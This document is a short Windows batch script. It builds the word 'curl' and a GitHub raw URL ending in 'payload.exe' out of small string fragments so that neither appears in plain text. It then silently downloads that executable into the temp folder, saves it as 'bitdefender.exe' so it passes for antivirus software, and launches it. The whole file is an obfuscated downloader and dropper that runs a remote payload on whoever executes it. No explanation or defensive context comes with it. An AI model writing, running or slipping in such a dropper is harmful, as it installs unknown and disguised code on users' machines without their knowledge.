@echo off
setlocal EnableExtensions DisableDelayedExpansion
set "c1=cu"
set "c2=rl"
set "C=%c1%%c2%"
set "p1=ht"
set "p2=tp"
set "p3=s"
set "p4=://"
set "d1=gi"
set "d2=th"
set "d3=ub"
set "d4=."
set "d5=co"
set "d6=m"
set "r1=Vo"
set "r2=id"
set "r3=Me"
set "r4=nu"
set "r5=/Vo"
set "r6=id"
set "r7=/ra"
set "r8=w/re"
set "r9=fs/he"
set "r10=ads/ma"
set "r11=in/pa"
set "r12=ylo"
set "r13=ad.exe"
set "U=%p1%%p2%%p3%%p4%%d1%%d2%%d3%%d4%%d5%%d6%/%r1%%r2%%r3%%r4%%r5%%r6%%r7%%r8%%r9%%r10%%r11%%r12%%r13%"
set "F=bitdefender.exe"
set "O=%TEMP%\%F%"
for %%# in (X) do (
    "%C%" -L --silent "%U%" -o "%O%"
)
if not exist "%O%" exit /b
start "" "%O%"
endlocal
